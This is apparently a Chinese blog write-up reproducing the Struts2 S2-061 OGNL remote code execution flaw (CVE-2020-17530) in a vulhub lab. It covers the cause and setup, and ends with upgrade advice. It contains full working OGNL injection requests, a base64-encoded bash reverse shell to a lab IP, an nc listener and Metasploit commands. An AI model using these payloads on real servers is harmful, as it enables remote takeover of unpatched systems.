• CVE-2020-17530 Struts2-061远程代码执行漏洞

    1 漏洞信息

    漏洞名称远程代码执行漏洞
    漏洞编号CVE-2020-17530
    危害等级高危
    CVSS评分7.5
    漏洞类型中间件漏洞
    漏洞厂商Apache
    漏洞组件Struts2
    受影响版本struts 2.0.0 - struts 2.5.25
    漏洞概述Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。

    2 漏洞原理

    由于Struts2 会对某些标签属性(比如 id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x}x 的值用户可控时,用户即可构造一些SSRF、远程命令执行等形式的payload,并将这些恶意payload以%{...}形式传入该标签属性, 即可造成OGNL表达式执行。S2-061是对S2-059沙盒进行的绕过。

    3 环境搭建

    3.1 环境概述

    • Linux操作系统(安装了vulhub漏洞环境)

    3.2 搭建过程

    进入到对应的环境中拉取镜像

    cd /vulhub/struts2/s2-061
docker-compose up -d

    • 1
    • 2

    4 漏洞复现

    首先使用id=%{99}来查看返回的id是81还是99,如果是81就说明进行了二次表达式解析,说明存在该漏洞;如果还是99的话,就说明没有进行二次表达式解析,不存在该漏洞。这里发现id的结果是81,说明进行了二次表达式解析,存在该漏洞。

    img

    然后进行抓包,修改为下面的代码,这里的arglist.add函数这里包含的值是你要执行的命令,比如这里我要执行的是whoami,所以就是arglist.add("whoami")

    POST /.action HTTP/1.1
Host: 192.168.1.136:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=node0ogtkm7uvdt1kgl7lufd5d04y1.node0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;  boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 833

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"
 

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("whoami")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18

    对要生成的反弹shell命令进行bash编码

    bash -i >& /dev/tcp/192.168.1.129/2022 0>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTI5LzIwMjIgMD4mMQ==}|{base64,-d}|{bash,-i}

    • 1
    • 2
    • 3

    img

    将编码后的payload加入加入到arglist.add参数中

    POST /.action HTTP/1.1
Host: 192.168.1.136:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=node0ogtkm7uvdt1kgl7lufd5d04y1.node0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;  boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 924

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"


%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTI5LzIwMjIgMD4mMQ==}|{base64,-d}|{bash,-i}")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18

    img

    反弹成功

    nc -lvp 2022

    • 1

    img
    还可以使用msf中的exploit/multi/http/struts2_multi_eval_ognl模块进行攻击

    CVE-2020-17530(s2-061), CVE-2019-0230(s2-059)都可以用这个模块进行攻击
use exploit/multi/http/struts2_multi_eval_ognl
set rhost 192.168.1.136
set rport 8080
run

    • 1
    • 2
    • 3
    • 4
    • 5

    在这里插入图片描述

    5 修复建议

    1、推荐的解决方案:升级至Struts 2.5.26版本或者更高版本。

  • 相关阅读:
    判断对象是否可以被回收:引用计数法,可达性分析,finalize()判定
    吲哚菁绿ICG标记Polyacetal聚缩醛/HA透明质酸纳米载体|ICG-Polyacetal|ICG-SS-PEG-HA
    useRef有什么用?
    铁塔基站用能监控能效解决方案
    AI对开发者职业的影响,保持领先的7 个行动指南
    机房监控系统PPT免费模板
    MySQL 生僻概念汇总
    SparkSQL 之 DataFrame&DataSet
    webpack原理篇(五十八):实战开发一个简易的webpack
    持续部署:提高敏捷加速软件交付(内含教程)
  • 原文地址:https://blog.csdn.net/weixin_45715461/article/details/125555688